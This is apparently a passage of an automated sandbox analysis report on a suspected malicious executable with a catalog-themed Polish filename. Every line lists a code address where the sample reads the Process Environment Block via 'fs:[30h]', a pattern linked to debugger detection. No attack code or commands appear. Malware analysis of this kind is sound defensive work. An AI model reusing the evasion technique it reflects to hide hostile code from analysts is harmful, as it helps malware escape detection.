          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BB171 mov eax, dword ptr fs:[00000030h]1_2_009BB171
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC962 mov eax, dword ptr fs:[00000030h]1_2_009BC962
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009ED294 mov eax, dword ptr fs:[00000030h]1_2_009ED294
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009ED294 mov eax, dword ptr fs:[00000030h]1_2_009ED294
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CAAB0 mov eax, dword ptr fs:[00000030h]1_2_009CAAB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CAAB0 mov eax, dword ptr fs:[00000030h]1_2_009CAAB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EFAB0 mov eax, dword ptr fs:[00000030h]1_2_009EFAB0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]1_2_009B52A5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]1_2_009B52A5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]1_2_009B52A5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]1_2_009B52A5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B52A5 mov eax, dword ptr fs:[00000030h]1_2_009B52A5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2ACB mov eax, dword ptr fs:[00000030h]1_2_009E2ACB
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2AE4 mov eax, dword ptr fs:[00000030h]1_2_009E2AE4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D3A1C mov eax, dword ptr fs:[00000030h]1_2_009D3A1C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h]1_2_009B5210
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov ecx, dword ptr fs:[00000030h]1_2_009B5210
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h]1_2_009B5210
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B5210 mov eax, dword ptr fs:[00000030h]1_2_009B5210
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAA16 mov eax, dword ptr fs:[00000030h]1_2_009BAA16
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAA16 mov eax, dword ptr fs:[00000030h]1_2_009BAA16
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C8A0A mov eax, dword ptr fs:[00000030h]1_2_009C8A0A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F4A2C mov eax, dword ptr fs:[00000030h]1_2_009F4A2C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F4A2C mov eax, dword ptr fs:[00000030h]1_2_009F4A2C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6B260 mov eax, dword ptr fs:[00000030h]1_2_00A6B260
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6B260 mov eax, dword ptr fs:[00000030h]1_2_00A6B260
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88A62 mov eax, dword ptr fs:[00000030h]1_2_00A88A62
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]1_2_009B9240
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]1_2_009B9240
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]1_2_009B9240
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B9240 mov eax, dword ptr fs:[00000030h]1_2_009B9240
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F927A mov eax, dword ptr fs:[00000030h]1_2_009F927A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7EA55 mov eax, dword ptr fs:[00000030h]1_2_00A7EA55
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A44257 mov eax, dword ptr fs:[00000030h]1_2_00A44257
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2397 mov eax, dword ptr fs:[00000030h]1_2_009E2397
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A85BA5 mov eax, dword ptr fs:[00000030h]1_2_00A85BA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EB390 mov eax, dword ptr fs:[00000030h]1_2_009EB390
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C1B8F mov eax, dword ptr fs:[00000030h]1_2_009C1B8F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C1B8F mov eax, dword ptr fs:[00000030h]1_2_009C1B8F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6D380 mov ecx, dword ptr fs:[00000030h]1_2_00A6D380
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7138A mov eax, dword ptr fs:[00000030h]1_2_00A7138A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h]1_2_009E4BAD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h]1_2_009E4BAD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4BAD mov eax, dword ptr fs:[00000030h]1_2_009E4BAD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A353CA mov eax, dword ptr fs:[00000030h]1_2_00A353CA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A353CA mov eax, dword ptr fs:[00000030h]1_2_00A353CA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DDBE9 mov eax, dword ptr fs:[00000030h]1_2_009DDBE9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]1_2_009E03E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]1_2_009E03E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]1_2_009E03E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]1_2_009E03E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]1_2_009E03E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E03E2 mov eax, dword ptr fs:[00000030h]1_2_009E03E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7131B mov eax, dword ptr fs:[00000030h]1_2_00A7131B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BF358 mov eax, dword ptr fs:[00000030h]1_2_009BF358
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BDB40 mov eax, dword ptr fs:[00000030h]1_2_009BDB40
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E3B7A mov eax, dword ptr fs:[00000030h]1_2_009E3B7A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E3B7A mov eax, dword ptr fs:[00000030h]1_2_009E3B7A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88B58 mov eax, dword ptr fs:[00000030h]1_2_00A88B58
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BDB60 mov ecx, dword ptr fs:[00000030h]1_2_009BDB60
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C849B mov eax, dword ptr fs:[00000030h]1_2_009C849B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h]1_2_00A36CF0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h]1_2_00A36CF0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36CF0 mov eax, dword ptr fs:[00000030h]1_2_00A36CF0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A714FB mov eax, dword ptr fs:[00000030h]1_2_00A714FB
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88CD6 mov eax, dword ptr fs:[00000030h]1_2_00A88CD6
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71C06 mov eax, dword ptr fs:[00000030h]1_2_00A71C06
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h]1_2_00A8740D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h]1_2_00A8740D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8740D mov eax, dword ptr fs:[00000030h]1_2_00A8740D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]1_2_00A36C0A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]1_2_00A36C0A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]1_2_00A36C0A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36C0A mov eax, dword ptr fs:[00000030h]1_2_00A36C0A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EBC2C mov eax, dword ptr fs:[00000030h]1_2_009EBC2C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA44B mov eax, dword ptr fs:[00000030h]1_2_009EA44B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D746D mov eax, dword ptr fs:[00000030h]1_2_009D746D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4C450 mov eax, dword ptr fs:[00000030h]1_2_00A4C450
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4C450 mov eax, dword ptr fs:[00000030h]1_2_00A4C450
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A805AC mov eax, dword ptr fs:[00000030h]1_2_00A805AC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A805AC mov eax, dword ptr fs:[00000030h]1_2_00A805AC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EFD9B mov eax, dword ptr fs:[00000030h]1_2_009EFD9B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EFD9B mov eax, dword ptr fs:[00000030h]1_2_009EFD9B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]1_2_009B2D8A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]1_2_009B2D8A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]1_2_009B2D8A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]1_2_009B2D8A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B2D8A mov eax, dword ptr fs:[00000030h]1_2_009B2D8A
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]1_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]1_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]1_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E2581 mov eax, dword ptr fs:[00000030h]1_2_009E2581
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h]1_2_009E1DB5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h]1_2_009E1DB5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E1DB5 mov eax, dword ptr fs:[00000030h]1_2_009E1DB5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E35A1 mov eax, dword ptr fs:[00000030h]1_2_009E35A1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A68DF1 mov eax, dword ptr fs:[00000030h]1_2_00A68DF1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A36DC9 mov eax, dword ptr fs:[00000030h]1_2_00A36DC9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h]1_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CD5E0 mov eax, dword ptr fs:[00000030h]1_2_009CD5E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A3A537 mov eax, dword ptr fs:[00000030h]1_2_00A3A537
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88D34 mov eax, dword ptr fs:[00000030h]1_2_00A88D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7E539 mov eax, dword ptr fs:[00000030h]1_2_00A7E539
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]1_2_009E4D3B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]1_2_009E4D3B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E4D3B mov eax, dword ptr fs:[00000030h]1_2_009E4D3B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C3D34 mov eax, dword ptr fs:[00000030h]1_2_009C3D34
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BAD30 mov eax, dword ptr fs:[00000030h]1_2_009BAD30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009D7D50 mov eax, dword ptr fs:[00000030h]1_2_009D7D50
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F3D43 mov eax, dword ptr fs:[00000030h]1_2_009F3D43
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A33540 mov eax, dword ptr fs:[00000030h]1_2_00A33540
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h]1_2_009DC577
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DC577 mov eax, dword ptr fs:[00000030h]1_2_009DC577
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A346A7 mov eax, dword ptr fs:[00000030h]1_2_00A346A7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]1_2_00A80EA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]1_2_00A80EA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A80EA5 mov eax, dword ptr fs:[00000030h]1_2_00A80EA5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FE87 mov eax, dword ptr fs:[00000030h]1_2_00A4FE87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E36CC mov eax, dword ptr fs:[00000030h]1_2_009E36CC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F8EC7 mov eax, dword ptr fs:[00000030h]1_2_009F8EC7
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A6FEC0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E16E0 mov ecx, dword ptr fs:[00000030h]1_2_009E16E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88ED6 mov eax, dword ptr fs:[00000030h]1_2_00A88ED6
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C76E2 mov eax, dword ptr fs:[00000030h]1_2_009C76E2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]1_2_009EA61C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA61C mov eax, dword ptr fs:[00000030h]1_2_009EA61C
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A6FE3F mov eax, dword ptr fs:[00000030h]1_2_00A6FE3F
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]1_2_009BC600
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]1_2_009BC600
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BC600 mov eax, dword ptr fs:[00000030h]1_2_009BC600
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E8E00 mov eax, dword ptr fs:[00000030h]1_2_009E8E00
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A71608 mov eax, dword ptr fs:[00000030h]1_2_00A71608
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BE620 mov eax, dword ptr fs:[00000030h]1_2_009BE620
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]1_2_009C7E41
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]1_2_00A7AE44
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]1_2_00A7AE44
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]1_2_009DAE73
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C766D mov eax, dword ptr fs:[00000030h]1_2_009C766D
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C8794 mov eax, dword ptr fs:[00000030h]1_2_009C8794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]1_2_00A37794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]1_2_00A37794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]1_2_00A37794
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F37F5 mov eax, dword ptr fs:[00000030h]1_2_009F37F5
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DF716 mov eax, dword ptr fs:[00000030h]1_2_009DF716
